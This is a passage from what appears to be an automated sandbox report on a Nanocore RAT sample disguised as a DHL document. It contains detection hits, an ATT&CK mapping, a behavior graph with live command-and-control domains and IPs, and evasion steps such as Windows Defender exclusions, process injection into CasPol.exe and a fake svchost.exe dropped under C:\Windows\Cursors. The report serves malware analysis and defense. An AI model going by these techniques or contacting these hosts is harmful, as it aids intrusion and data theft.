          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: 12_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)Show sources
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
          Source: svchost.exe, 00000009.00000002.512125264.0000015976241000.00000004.00000001.sdmpBinary or memory string: "@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
          Source: svchost.exe, 00000009.00000002.512891423.0000015976302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: svchost.exe, 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools21Input Capture1File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery23Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsService Execution2Registry Run Keys / Startup Folder11Access Token Manipulation1Software Packing11NTDSSecurity Software Discovery351Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptWindows Service1Timestomp1LSA SecretsVirtualization/Sandbox Evasion18SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonProcess Injection312DLL Side-Loading1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol12Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder11Masquerading221DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion18Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection312Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358257 Sample: DHL_document1102202068090891.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 56 noancore.linkpc.net 2->56 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 12 other signatures 2->78 8 DHL_document1102202068090891.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 12 other processes 2->17 signatures3 process4 dnsIp5 68 coroloboxorozor.com 172.67.172.17, 49716, 49727, 80 CLOUDFLARENETUS United States 8->68 52 C:\Windows\Cursors\...\svchost.exe, PE32 8->52 dropped 54 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->54 dropped 80 Creates an autostart registry key pointing to binary in C:\Windows 8->80 82 Writes to foreign memory regions 8->82 84 Adds a directory exclusion to Windows Defender 8->84 90 4 other signatures 8->90 19 CasPol.exe 8->19         started        23 AdvancedRun.exe 1 8->23         started        25 cmd.exe 8->25         started        36 3 other processes 8->36 27 svchost.exe 13->27         started        86 Drops executables to the windows directory (C:\Windows) and starts them 15->86 30 svchost.exe 15->30         started        70 127.0.0.1 unknown unknown 17->70 88 Changes security center settings (notifications, updates, antivirus, firewall) 17->88 32 MpCmdRun.exe 17->32         started        34 WerFault.exe 17->34         started        file6 signatures7 process8 dnsIp9 58 noancore.linkpc.net 185.157.160.229, 6700 OBE-EUROPEObenetworkEuropeSE Sweden 19->58 50 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 19->50 dropped 60 192.168.2.1 unknown unknown 23->60 38 AdvancedRun.exe 23->38         started        40 conhost.exe 25->40         started        42 timeout.exe 25->42         started        62 coroloboxorozor.com 27->62 92 System process connects to network (likely due to code injection or exploit) 27->92 94 Multi AV Scanner detection for dropped file 27->94 96 Machine Learning detection for dropped file 27->96 64 104.21.71.230, 49731, 80 CLOUDFLARENETUS United States 30->64 66 coroloboxorozor.com 30->66 44 conhost.exe 32->44         started        46 conhost.exe 36->46         started        48 conhost.exe 36->48         started        file10 signatures11 process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL_document1102202068090891.exe28%VirustotalBrowse
          DHL_document1102202068090891.exe33%ReversingLabsByteCode-MSIL.Downloader.BaseLoader
          DHL_document1102202068090891.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe100%Joe Sandbox ML
